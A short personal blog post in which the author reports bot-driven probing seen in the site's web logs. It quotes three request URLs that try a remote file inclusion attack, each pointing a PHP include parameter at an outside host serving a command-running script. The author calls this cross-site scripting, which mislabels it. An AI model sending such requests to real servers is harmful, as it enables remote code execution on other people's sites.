Geek Drivel is under attack!

Over the past couple days, I’ve noticed three odd URLs in my web logs, from three different IP addresses, all using different versions of libwww-perl as the browser ID:

  • /category//includes/global.php?nbs=http://nusay.webng.com/31337.txt???
  • /category//includes/auth.php?nbs=http://nusay.webng.com/31337.txt??
  • /category//includes/global.php?nbs=http://usuarios.arnet.com.ar/larry123/safe.txt?
  • Curious, I checked out the “31337.txt” and “safe.txt” files… they were very similar, both consisting of near-identical PHP instructions that tried to get information about the system and run system commands. It looks like some kind of cross-site scripting attack attempt. I did a Google search on one of the more unique lines and discovered that this is some script-kiddie’s new toy… at least one botnet has been spewing these things out for the last several days. I’m not sure what it’s trying to exploit, but I’m happy to say that WordPress 2.2.2 (just released a few weeks ago, and which I upgraded to almost immediately) seems to be immune to it.

    4 Comments

    Comments are closed.